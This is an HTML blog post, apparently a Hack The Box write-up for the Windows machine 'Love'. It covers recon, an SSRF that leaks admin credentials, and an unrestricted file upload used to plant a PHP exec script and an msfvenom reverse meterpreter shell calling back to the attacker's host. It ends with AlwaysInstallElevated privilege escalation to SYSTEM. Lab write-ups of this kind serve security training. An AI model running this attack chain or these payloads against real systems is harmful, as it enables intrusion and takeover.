2021-07-27-htb-love.html

<!DOCTYPE html>
<html lang="en">
<head>
<!-- 2025-01-21 Tue 21:22 -->
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>HTB | Love</title>
<meta name="author" content="C3lphie" />
<meta name="generator" content="Org Mode" />
<link rel="stylesheet" type="text/css" href="static/style.css" />
<script>
// @license magnet:?xt=urn:btih:1f739d935676111cfff4b4693e3816e664797050&amp;dn=gpl-3.0.txt GPL-v3-or-Later
     function CodeHighlightOn(elem, id)
     {
       var target = document.getElementById(id);
       if(null != target) {
         elem.classList.add("code-highlighted");
         target.classList.add("code-highlighted");
       }
     }
     function CodeHighlightOff(elem, id)
     {
       var target = document.getElementById(id);
       if(null != target) {
         elem.classList.remove("code-highlighted");
         target.classList.remove("code-highlighted");
       }
     }
// @license-end
</script>
</head>
<body>
<div id="preamble" class="status">
<div class="header">
    <a href="index.html">Home</a>
    <a href="https://github.com/c3lphie">Github</a>
</div>
</div>
<div id="content" class="content">
<header>
<h1 class="title">HTB | Love</h1>
</header><nav id="table-of-contents" role="doc-toc">
<h2>Table of Contents</h2>
<div id="text-table-of-contents" role="doc-toc">
<ul>
<li><a href="#org6411c8e">1. Introduction</a></li>
<li><a href="#orgea2e99d">2. Recon</a>
<ul>
<li><a href="#org269b55e">2.1. Nmap</a></li>
<li><a href="#orgc314670">2.2. Web enumeration</a>
<ul>
<li><a href="#org8addbcc">2.2.1. Virtual host enumeration</a></li>
<li><a href="#orga4873aa">2.2.2. Enumerating <code>http://love.htb</code></a>
<ul>
<li><a href="#org4ddf32b">2.2.2.1. Gobuster</a></li>
</ul>
</li>
<li><a href="#org5864660">2.2.3. Enumerating <code>http://staging.love.htb</code></a>
<ul>
<li><a href="#org8caad8a">2.2.3.1. Gobuster</a></li>
<li><a href="#org4bd8449">2.2.3.2. <code>/beta.php</code></a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><a href="#org24d0973">3. Exploitation</a>
<ul>
<li><a href="#org015a337">3.1. Getting admin credentials from ssrf</a></li>
<li><a href="#org5423924">3.2. Logging into <code>/admin/</code></a>
<ul>
<li><a href="#orge1147c1">3.2.1. XSS</a></li>
<li><a href="#orgda9dc54">3.2.2. SQL injection</a></li>
<li><a href="#orgde1c69c">3.2.3. File-upload</a></li>
</ul>
</li>
<li><a href="#org4cfa14c">3.3. File-upload on <code>/admin/candidates.php</code></a></li>
</ul>
</li>
<li><a href="#org46f859f">4. Priv esc</a>
<ul>
<li><a href="#org5847ba8">4.1. Local auto-suggest</a></li>
<li><a href="#orge0d83f7">4.2. Always install elevated</a></li>
</ul>
</li>
<li><a href="#org6ec765c">5. Final words</a></li>
</ul>
</div>
</nav>
<div id="outline-container-org6411c8e" class="outline-2">
<h2 id="org6411c8e"><span class="section-number-2">1.</span> Introduction</h2>
<div class="outline-text-2" id="text-1">
<p>
Welcome to this write-up for the Hack the Box machine: Love.<br>
Love was an easy rated Windows machine, running a webserver for a voting system and a file scanner located on a staging subdomain.<br>
</p>
</div>
</div>

<div id="outline-container-orgea2e99d" class="outline-2">
<h2 id="orgea2e99d"><span class="section-number-2">2.</span> Recon</h2>
<div class="outline-text-2" id="text-2">
<p>
First thing we should do is to get as much information about the box as possible.<br>
First we'll scan for open ports using <code>nmap</code>, once we know what's running on the machine we can tailor the rest of the reconnaissance to better fit.<br>
</p>
</div>
<div id="outline-container-org269b55e" class="outline-3">
<h3 id="org269b55e"><span class="section-number-3">2.1.</span> Nmap</h3>
<div class="outline-text-3" id="text-2-1">
<p>
Since this is just a challenge there is no reason to go super stealthy.<br>
I used the following command to enumerate all open ports, and check which version is running on the port:<br>
</p>
<pre class="example">
$ sudo nmap -sV -p- -oA nmap/version_scan_all_ports 10.129.48.103
</pre>

<pre class="example" id="orgbb39f99">
# Nmap 7.91 scan initiated Sun Jul 25 20:11:00 2021 as: nmap -sV -p- -oA nmap/version_scan_all_ports 10.129.48.103
Nmap scan report for 10.129.48.103
Host is up (0.035s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=7/25%Time=60FDA958%P=x86_64-unknown-linux-gnu
SF:%r(NULL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.87'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 25 20:14:21 2021 -- 1 IP address (1 host up) scanned in 201.09 seconds
</pre>

<p>
Looking at the table below, we can deduce that it is a Windows machine running multiple webservers.<br>
</p>
<table>
<caption class="t-above"><span class="table-number">Table 1:</span> Table over open ports</caption>

<colgroup>
<col  class="org-left">

<col  class="org-right">

<col  class="org-left">

<col  class="org-left">
</colgroup>
<thead>
<tr>
<th scope="col" class="org-left">Service</th>
<th scope="col" class="org-right">Port</th>
<th scope="col" class="org-left">Daemon</th>
<th scope="col" class="org-left">Version</th>
</tr>
</thead>
<tbody>
<tr>
<td class="org-left">http</td>
<td class="org-right">80</td>
<td class="org-left">Apache httpd</td>
<td class="org-left">2.4.46</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">135</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">netbios-ssn</td>
<td class="org-right">139</td>
<td class="org-left">Microsoft Windows netbios-ssn</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">ssl/http</td>
<td class="org-right">443</td>
<td class="org-left">Apache httpd</td>
<td class="org-left">2.4.46</td>
</tr>

<tr>
<td class="org-left">microsoft-ds</td>
<td class="org-right">445</td>
<td class="org-left">Microsoft Windows 7 - 10 microsoft-ds</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">mysql?</td>
<td class="org-right">3306</td>
<td class="org-left">??</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">http</td>
<td class="org-right">5000</td>
<td class="org-left">Apache httpd</td>
<td class="org-left">2.4.46</td>
</tr>

<tr>
<td class="org-left">unknown</td>
<td class="org-right">5040</td>
<td class="org-left">??</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">http</td>
<td class="org-right">5985</td>
<td class="org-left">Microsoft HTTPAPI httpd</td>
<td class="org-left">2.0</td>
</tr>

<tr>
<td class="org-left">ssl/http</td>
<td class="org-right">5986</td>
<td class="org-left">Microsoft HTTPAPI httpd</td>
<td class="org-left">2.0</td>
</tr>

<tr>
<td class="org-left">http</td>
<td class="org-right">47001</td>
<td class="org-left">Microsoft HTTPAPI httpd</td>
<td class="org-left">2.0</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">49664</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">49665</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">49666</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">49667</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">49668</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">49669</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>

<tr>
<td class="org-left">msrpc</td>
<td class="org-right">49670</td>
<td class="org-left">Microsoft Windows RPC</td>
<td class="org-left">??</td>
</tr>
</tbody>
</table>

<p>
We also got the hostname <code>love.htb</code> from the scan results, so let's add that to <code>/etc/hosts</code> file:<br>
</p>
<pre class="example">
$ sudo echo "10.129.48.103 love.htb" &gt;&gt; /etc/hosts
</pre>
</div>
</div>

<div id="outline-container-orgc314670" class="outline-3">
<h3 id="orgc314670"><span class="section-number-3">2.2.</span> Web enumeration</h3>
<div class="outline-text-3" id="text-2-2">
<p>
Since there are more than one webserver running, there is the possibility that they are mapped to virtual hosts.<br>
So let's start <code>gobuster</code> in virtual host mode and start enumerating.<br>
</p>
</div>
<div id="outline-container-org8addbcc" class="outline-4">
<h4 id="org8addbcc"><span class="section-number-4">2.2.1.</span> Virtual host enumeration</h4>
<div class="outline-text-4" id="text-2-2-1">
<p>
For this enumeration I used the <code>subdomains-top1million-20000.txt</code> DNS wordlist from the <a href="https://github.com/danielmiessler/SecLists">SecLists repository</a>.<br>
</p>
<pre class="example" id="orgfd8141f">
┌──[ c3lphie@c3lphie-laptop:~/hacking/ctf/hackthebox/machines/love ]
└─&gt; $ gobuster vhost -u "http://love.htb" -w ~/repositories/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://love.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /home/c3lphie/repositories/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/07/25 21:15:06 Starting gobuster in VHOST enumeration mode
===============================================================
Found: staging.love.htb (Status: 200) [Size: 5357]
Progress: 18380 / 19967 (92.05%)                 

===============================================================
2021/07/25 21:16:39 Finished
===============================================================
</pre>
<p>
<code>staging.love.htb</code> sounds like a development server, which might be filled with vulnerabilties.<br>
</p>

<p>
This gives us the two targets:<br>
</p>
<ul class="org-ul">
<li><code>http://love.htb</code><br></li>
<li><code>http://staging.love.htb</code><br></li>
</ul>

<p>
Let's start enumerating files and directories with <code>gobuster</code>.<br>
</p>
</div>
</div>
<div id="outline-container-orga4873aa" class="outline-4">
<h4 id="orga4873aa"><span class="section-number-4">2.2.2.</span> Enumerating <code>http://love.htb</code></h4>
<div class="outline-text-4" id="text-2-2-2">
<p>
As you can see on the image below, there isn't a lot we can do regarding the homepage of this site.<br>
</p>

<figure id="org2aed816">
<img src="assets/2021-07-25_20-13-13_screenshot.png" alt="2021-07-25_20-13-13_screenshot.png"><br>

<figcaption><span class="figure-number">Figure 1: </span>Index of <code>http://love.htb</code></figcaption>
</figure>

<p>
Let us start by enumerating the main site using <code>gobuster</code>, and hope that we get something more useful than that login page.<br>
</p>
</div>
<div id="outline-container-org4ddf32b" class="outline-5">
<h5 id="org4ddf32b"><span class="section-number-5">2.2.2.1.</span> Gobuster</h5>
<div class="outline-text-5" id="text-2-2-2-1">
<pre class="example" id="org78fa7f4">
┌──[ c3lphie@c3lphie-laptop:~/hacking/ctf/hackthebox/machines/love ]
└─&gt; $ gobuster dir -u "http://love.htb" -w ~/repositories/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -b 403,404 -x php -d                                                                                             20:55
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://love.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/c3lphie/repositories/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/07/25 20:55:57 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 330] [--&gt; http://love.htb/images/]
/admin                (Status: 301) [Size: 329] [--&gt; http://love.htb/admin/]
/includes             (Status: 301) [Size: 332] [--&gt; http://love.htb/includes/]
/login.php            (Status: 302) [Size: 0] [--&gt; index.php]
/index.php            (Status: 200) [Size: 4388]
/plugins              (Status: 301) [Size: 331] [--&gt; http://love.htb/plugins/]
/logout.php           (Status: 302) [Size: 0] [--&gt; index.php]
/home.php             (Status: 302) [Size: 0] [--&gt; index.php]
/.                    (Status: 200) [Size: 4388]
/preview.php          (Status: 302) [Size: 0] [--&gt; index.php]
/examples             (Status: 503) [Size: 398]
/dist                 (Status: 301) [Size: 328] [--&gt; http://love.htb/dist/]    [
/tcpdf                (Status: 301) [Size: 329] [--&gt; http://love.htb/tcpdf/]
</pre>

<p>
Looking at the scan results from <code>gobuster</code>, we can see that there is an admin interface in the <code>/admin/</code> directory.<br>
But it can only be accessed using matching credentials.<br>
</p>
</div>
</div>
</div>

<div id="outline-container-org5864660" class="outline-4">
<h4 id="org5864660"><span class="section-number-4">2.2.3.</span> Enumerating <code>http://staging.love.htb</code></h4>
<div class="outline-text-4" id="text-2-2-3">
<p>
As you can see there isn't a whole lot going on homepage for the staging site.<br>
</p>
<p>
<img src="assets/2021-07-25_23-47-04_screenshot.png" alt="2021-07-25_23-47-04_screenshot.png"><br>
We can see that there is a Demo page, which links to <code>/beta.php</code>.<br>
There is a user input, but looking at the source code of the page we'll see that nothing happens once submitted.<br>
</p>

<p>
Just to be sure that we don't miss anything, I'll enumerate this server with <code>gobuster</code>.<br>
</p>
</div>
<div id="outline-container-org8caad8a" class="outline-5">
<h5 id="org8caad8a"><span class="section-number-5">2.2.3.1.</span> Gobuster</h5>
<div class="outline-text-5" id="text-2-2-3-1">
<p>
As can be seen on the results below, there isn't anything of interest except for <code>/beta.php</code>.<br>
So let us take a closer look at that!<br>
</p>
<pre class="example" id="org4b22b58">
┌──[ c3lphie@c3lphie-laptop:~/hacking/ctf/hackthebox/machines/love ]
└─&gt; $ gobuster dir -u "http://staging.love.htb" -w ~/repositories/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php -d -b 404,403 -o gobuster/staging.love.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://staging.love.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/c3lphie/repositories/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/07/25 21:20:32 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 5357]
/beta.php             (Status: 200) [Size: 4997]
/.                    (Status: 200) [Size: 5357]
/examples             (Status: 503) [Size: 406]

===============================================================
2021/07/25 21:50:04 Finished
===============================================================
</pre>
</div>
</div>

<div id="outline-container-org4bd8449" class="outline-5">
<h5 id="org4bd8449"><span class="section-number-5">2.2.3.2.</span> <code>/beta.php</code></h5>
<div class="outline-text-5" id="text-2-2-3-2">
<p>
This accepts a url pointing to a specific file somewhere on the internet.<br>
</p>

<figure id="org06321e1">
<img src="./assets/2021-07-25_23-45-36_screenshot.png" alt="2021-07-25_23-45-36_screenshot.png"><br>

<figcaption><span class="figure-number">Figure 2: </span>Image of <code>/beta.php</code></figcaption>
</figure>

<p>
This could be vulnerable to a Server Side Request Forgery (SSRF) attack.<br>
</p>
</div>
</div>
</div>
</div>
</div>

<div id="outline-container-org24d0973" class="outline-2">
<h2 id="org24d0973"><span class="section-number-2">3.</span> Exploitation</h2>
<div class="outline-text-2" id="text-3">
<p>
We have done all necessary reconnaissance up to this point.<br>
So let us begin attacking this box, by first gaining access to the voting systems admin page.<br>
</p>
</div>
<div id="outline-container-org015a337" class="outline-3">
<h3 id="org015a337"><span class="section-number-3">3.1.</span> Getting admin credentials from ssrf</h3>
<div class="outline-text-3" id="text-3-1">
<p>
If we point the site to <code>http://127.0.0.1/index.php</code>, we will see that some of the target website is rendered.<br>
</p>

<figure id="org8290e04">
<img src="assets/2021-07-26_00-05-39_screenshot.png" alt="2021-07-26_00-05-39_screenshot.png"><br>

<figcaption><span class="figure-number">Figure 3: </span>SSRF pointing to voter login page</figcaption>
</figure>

<p>
The entire request sent by the form can be seen below.<br>
</p>
<pre class="example" id="org7cf1878">
POST http://staging.love.htb/beta.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://staging.love.htb
Connection: keep-alive
Referer: https://staging.love.htb/beta.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Host: staging.love.htb

file=http%3A%2F%2F127.0.0.1%2Findex.php&amp;read=Scan+file
</pre>

<p>
Let's us try the webserver running on port <code>5000</code>, just to see if there is anything interesting.<br>
</p>

<figure id="orgf2e1066">
<img src="assets/2021-07-26_00-14-56_screenshot.png" alt="2021-07-26_00-14-56_screenshot.png"><br>

<figcaption><span class="figure-number">Figure 4: </span>Scanning <code>http://127.0.0.1:5000/index.php</code></figcaption>
</figure>

<p>
And we got our first set of credentials!<br>
<code>admin:@LoveIsInTheAir!!!!</code><br>
</p>
</div>
</div>
<div id="outline-container-org5423924" class="outline-3">
<h3 id="org5423924"><span class="section-number-3">3.2.</span> Logging into <code>/admin/</code></h3>
<div class="outline-text-3" id="text-3-2">
<p>
Now that we have the username and password for the admin area of the voting system, let's login and start poking around at the different functionalities.<br>
</p>

<p>
Logging in as <code>admin</code> gives the following interface<br>
</p>

<figure id="org4227a12">
<img src="assets/2021-07-26_00-26-15_screenshot.png" alt="2021-07-26_00-26-15_screenshot.png"><br>

<figcaption><span class="figure-number">Figure 5: </span>Admin interface for voting system</figcaption>
</figure>

<p>
One of the sites which peaked my interest was the <code>/candidates.php</code> file in the <code>/admin/</code> directory.<br>
</p>

<p>
On this site I poked around found the following three vulnerabilties on this endpoint:<br>
</p>
<ul class="org-ul">
<li>XSS<br></li>
<li>SQL injection<br></li>
<li>Insecure File upload<br></li>
</ul>
</div>

<div id="outline-container-orge1147c1" class="outline-4">
<h4 id="orge1147c1"><span class="section-number-4">3.2.1.</span> XSS</h4>
<div class="outline-text-4" id="text-3-2-1">
<p>
All of the fields for candidates seem, vulnerable to XSS attacks.<br>
It was possible to pop an alert in the description of a candidate.<br>
</p>

<p>
<img src="assets/2021-07-26_00-44-08_screenshot.png" alt="2021-07-26_00-44-08_screenshot.png"><br>
However, it didn't seem to be affecting the voters.<br>
And since we are already admin, there is not a that we could gain from this.<br>
</p>
</div>
</div>
<div id="outline-container-orgda9dc54" class="outline-4">
<h4 id="orgda9dc54"><span class="section-number-4">3.2.2.</span> SQL injection</h4>
<div class="outline-text-4" id="text-3-2-2">
<p>
There was also an error in the implementation of SQL, but I couldn't put it to any use.<br>
</p>

<figure id="org06d01d6">
<img src="assets/2021-07-26_00-54-21_screenshot.png" alt="2021-07-26_00-54-21_screenshot.png"><br>

<figcaption><span class="figure-number">Figure 6: </span>Error in SQL syntax</figcaption>
</figure>

<p>
The parameter vulnerable to SQL injection was the <code>plaform</code> parameter shown in the POST request below.<br>
</p>
<pre class="example" id="orge9a293a">
POST http://love.htb/admin/candidates_edit.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: https://love.htb
Connection: keep-alive
Referer: https://love.htb/admin/candidates.php
Cookie: PHPSESSID=62ib5d27nim0fbh9ikd8ujjo60
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Host: love.htb

id=18&amp;firstname=test&amp;lastname=test&amp;position=8&amp;platform=%27--&amp;edit=
</pre>
<p>
Since SQL injection isn't my strongest attack, I tested the parameter using <code>SQLmap</code>.<br>
But without success.<br>
</p>
</div>
</div>
<div id="outline-container-orgde1c69c" class="outline-4">
<h4 id="orgde1c69c"><span class="section-number-4">3.2.3.</span> File-upload</h4>
<div class="outline-text-4" id="text-3-2-3">
<p>
This brings us to the last vulnerability, which is also the most powerful.<br>
</p>

<p>
When creating a candidate, it is possible to upload a photo of the candidate.<br>
But there isn't any checks on what the filetype actually is, meaning we can upload any file we that we want to.<br>
This is the vulnerability we will use to get a shell on the system.<br>
</p>
</div>
</div>
</div>
<div id="outline-container-org4cfa14c" class="outline-3">
<h3 id="org4cfa14c"><span class="section-number-3">3.3.</span> File-upload on <code>/admin/candidates.php</code></h3>
<div class="outline-text-3" id="text-3-3">
<p>
Because this is a Windows box, I'll be taking the liberty of using the Metasploit framework.<br>
I'll do this in two parts, first we'll create a reverse meterpreter shell.<br>
And a small php script which will execute our meterpreter shell.<br>
</p>

<p>
The php script that will execute our meterpreter shell, is rather simple as you can see below.<br>
</p>
<div class="org-src-container">
<label class="org-src-name"><span class="listing-number">Listing 1: </span>Shell execution script</label><pre class="src src-php"><span class="org-php-php-tag">&lt;?php</span>
<span class="org-php-function-call-traditional">exec</span>(<span class="org-php-string">"shell.exe"</span>);
<span class="org-php-php-tag">?&gt;</span>
</pre>
</div>

<p>
The meterpreter shell is generated using the <code>msfvenom</code><br>
</p>
<pre class="example" id="org1629b27">
┌──[ c3lphie@c3lphie-laptop:~/hacking/ctf/hackthebox/machines/love/shells ]
└─&gt; $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.87 LPORT=4444 -f exe &gt; shell.exe                15:37
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

</pre>
<p>
And a handler setup in <code>msfconsole</code> with options matching the ones in the payload generation.<br>
</p>

<p>
Now we upload both files, and navigate to the php file.<br>
And voila we have a shell!<br>
</p>
<pre class="example" id="org34a52a9">
meterpreter &gt; getuid
Server username: LOVE\Phoebe
meterpreter &gt;
</pre>

<p>
Let's navigate to the desktop and get the flag!<br>
</p>
<pre class="example" id="org9a14c0f">
meterpreter &gt; cd Desktop
meterpreter &gt; ls
Listing: C:\Users\Phoebe\Desktop
================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2021-04-13 00:50:47 +0200  desktop.ini
100444/r--r--r--  34    fil   2021-04-13 12:20:32 +0200  user.txt

meterpreter &gt; cat user.txt
39e8████████████████████████████
meterpreter &gt;
</pre>
</div>
</div>
</div>
<div id="outline-container-org46f859f" class="outline-2">
<h2 id="org46f859f"><span class="section-number-2">4.</span> Priv esc</h2>
<div class="outline-text-2" id="text-4">
<p>
Now that we have a normal user shell, we should do some enumeration to figure out how we should go about gaining a root shell.<br>
</p>

<p>
Since this is done through meterpreter, we can use a lot of modules from metasploit.<br>
</p>
</div>
<div id="outline-container-org5847ba8" class="outline-3">
<h3 id="org5847ba8"><span class="section-number-3">4.1.</span> Local auto-suggest</h3>
<div class="outline-text-3" id="text-4-1">
<p>
This is a very nifty little module, which will suggest local exploits that can be used to elevate privileges.<br>
</p>
<pre class="example" id="orge36958b">
meterpreter &gt; run post/multi/recon/local_exploit_suggester

[*] 10.129.148.112 - Collecting local exploits for x86/windows...
[*] 10.129.148.112 - 38 exploit checks are being tried...
[+] 10.129.148.112 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.129.148.112 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.148.112 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 10.129.148.112 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.148.112 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.129.148.112 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
</pre>
<p>
As you can see the target is vulnerable to the <code>always_install_elevated</code> exploit.<br>
</p>
</div>
</div>
<div id="outline-container-orge0d83f7" class="outline-3">
<h3 id="orge0d83f7"><span class="section-number-3">4.2.</span> Always install elevated</h3>
<div class="outline-text-3" id="text-4-2">
<p>
Since the autosuggester mentioned this exploit, let's test if it is correct.<br>
This is done by running the following commands:<br>
</p>
<pre class="example" id="org199e665">
meterpreter &gt; shell
Process 6380 created.
Channel 6 created.
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\Phoebe\Desktop&gt;reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\Users\Phoebe\Desktop&gt;reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\Users\Phoebe\Desktop&gt;
</pre>
<p>
The registrykeys are enabled meaning we are vulnerable, just as the <code>local_exploit_suggester</code> said we were.<br>
</p>

<p>
Now we can run the exploit module:<br>
</p>
<pre class="example" id="orgf9c29cd">
meterpreter &gt; run exploit/windows/local/always_install_elevated LHOST=10.10.14.87

[*] Started reverse TCP handler on 10.10.14.87:4444
[*] Uploading the MSI to C:\Users\Phoebe\AppData\Local\Temp\zDLHrfRovO.msi ...
[*] Executing MSI...
[*] Sending stage (200262 bytes) to 10.129.148.112
[+] Deleted C:\Users\Phoebe\AppData\Local\Temp\zDLHrfRovO.msi
[*] Meterpreter session 9 opened (10.10.14.87:4444 -&gt; 10.129.148.112:63063) at 2021-07-26 17:27:24 +0200
[*] Session 9 created in the background.
</pre>
<p>
And a session was created, which means we have root!<br>
</p>

<p>
Now all we need is to switch to that session, and read the root flag.<br>
</p>
<pre class="example" id="org6c28445">
meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &gt; pwd
C:\Windows\System32
meterpreter &gt; cd /Users/Administrator/Desktop
meterpreter &gt; ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2021-04-12 23:55:12 +0200  desktop.ini
100444/r--r--r--  34    fil   2021-04-13 12:20:17 +0200  root.txt

meterpreter &gt; cat root.txt
567d████████████████████████████
</pre>
</div>
</div>
</div>
<div id="outline-container-org6ec765c" class="outline-2">
<h2 id="org6ec765c"><span class="section-number-2">5.</span> Final words</h2>
<div class="outline-text-2" id="text-5">
<p>
Thank you for taking some time out of your day to read this post.<br>
If you enjoyed this post, feel free to join my <a href="https://discord.gg/t8tKrgdGWu">Discord server</a> to get notification whenever I post something and ask questions if there are any.<br>
</p>
</div>
</div>
</div>
<div id="postamble" class="status">
<div class="footer">
    <div id="copyright">
        <small>&copy; Copyright 2022, C3lphie</small>
    </div>
</div>
</div>
</body>
</html>